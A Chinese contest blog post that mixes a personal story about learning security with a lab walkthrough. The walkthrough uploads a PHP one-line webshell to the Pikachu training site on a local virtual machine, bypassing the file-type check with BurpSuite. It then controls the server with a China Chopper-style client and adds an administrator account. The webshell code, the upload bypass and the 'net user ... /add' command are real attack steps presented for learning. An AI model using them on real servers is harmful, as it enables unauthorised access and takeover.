那年那“程序员”那些事儿

我正在参与CSDN《新程序员》有奖征文
链接地址：https://marketing.csdn.net/p/52c37904f6e1b69dc392234fff425442

那年那“程序员”那些事儿

---

              程序员等级之初出茅庐篇
   从等级的角度看待程序员，我将其划归为20级，也许还有
传说中的神级吧，哈哈！但那些都是真正的大佬级别人物。当
然，也许程序员的等级远远并非只有二十级，但我们都在朝着
满级修炼着，我们同为修炼者，修炼者一路刷怪，我们则是刷
代码。
   万事开头难，从刚踏上修行者之路的0级到现在2级（自我
评价），可谓是阻碍重重、艰难万分，好歹走过来了，内心还
是很高兴的。很难想象，在成为程序员之前，我的想法是学习
外国语。也许是每个男孩子都渴望拥有一段美好的爱情吧，外
国语的女生多呀，这是我起初萌生学习外国语想法的原因。但
是理性战胜了感性，中国的现实给男孩子太大的压力，买房买
车，这对于刚学有小成的我们来说是何等重大的包袱。我在想：
学习了外国语出来之后真的有出路吗！其实也不是完全没有，
但那是需要机会的，机会这东西玄乎，玄乎玄乎的，说来来说
走走，我不觉得自己运气好，所以坚定的走上了现在这条路。
              程序员等级之信息安全篇
   我特别想感谢蔡老师，他是我信息安全上的启蒙老师，从
他这里我学到了实实在在的东西。其实也可以说是缘分吧，学
校里组织了一次信息安全培训，我有幸去参加，从他那我学到
了BurpSuite抓包软件如何使用等等。这里分享一点干货，如
何通过木马获取虚拟机的webshell。
   其实，我感觉初期最痛苦的还是环境搭建，刚开始接触虚
拟机的时候真是要了命了，什么网卡呀、适配器呀那个时候
什么都不懂，最要命的还是连不上主机的网，搜索了无数网上
教程。。。哎！意犹未尽！虽然这些在现在看来也就那么回事
但是当时那个眉头呀，皱的都想给虚拟机卸了，什么玩意，
这个东西真的能自己完成吗。最后还是要感谢一位大三学长，
他是我踢足球认识的朋友的室友，感谢他给的有用的指点，
真的就是救我于水火之中啊，现在想来还是记忆犹新。

.

---

一、webshell是什么

webshell就是获取到服务器的操作权限

二、如何获取

1.第一阶段

  1、首先打开虚拟机，打开win2003，点击phpstudy软件
  点击启动。

2、windows+R—>cmd打开终端输入ipconfig找到win2003IP地址

3、打开火狐浏览器输入刚才的IP地址

4、得到这个界面后在ip后面加上pikachu
得到下面这个界面，选择mime type，这样就完成了第一部分

2.第二阶段

1、第一部分完成后，在桌面新建一个123.txt
里面写下木马

<?php @eval($_POST[123]); ?>

之后将txt改为jpg

2、接下来是点击浏览–>选择刚刚写好的木马123.jpg

然后打开抓包软件，开启代理!

3、一切准备完毕后点击开始上传（123.jpg）

抓到的包如上，将123.jpg改为123.php后放包即点击forward得到文件上传成功

4、然后关闭代理，将地址复制张贴如下，然后回车

5、回车之后得到的是空白界面，鼠标右击检查元素

之后的步骤根据下面图片中的数字来

这里用到了这个插件

点击第六步之后原本的空白界面出现了这个，这表示，我们的木马有效

3.第三阶段

1、将地址赋值复制

2、打开我们的菜刀软件，这里我用的是过狗狗菜刀，右击后点击添加，将地址张贴，在后面小方框内输入我们刚刚设置的密码123，点击添加

3、此时我们任务基本完成，如图我们已成功渗透目标主机，最后我们只需修改用户，将我们的用户升级为管理员即可

4、右击打开虚拟终端

5、打开虚拟终端后，输入net user可以查看有哪些用户
输入net user admin admin123 / add意思是添加你自己的用户，用户名是admin 密码是admin123.
完结！

总结

     关于webshell的实现原理的话我觉得就是客户端
 向服务器发送恶意代码写成的文件，比如这里简 单的木
 马 ， <?php @eval($_POST[123]); ?>，然后客户
 端通过木马远程连接到服务器，并对服务器进行操作。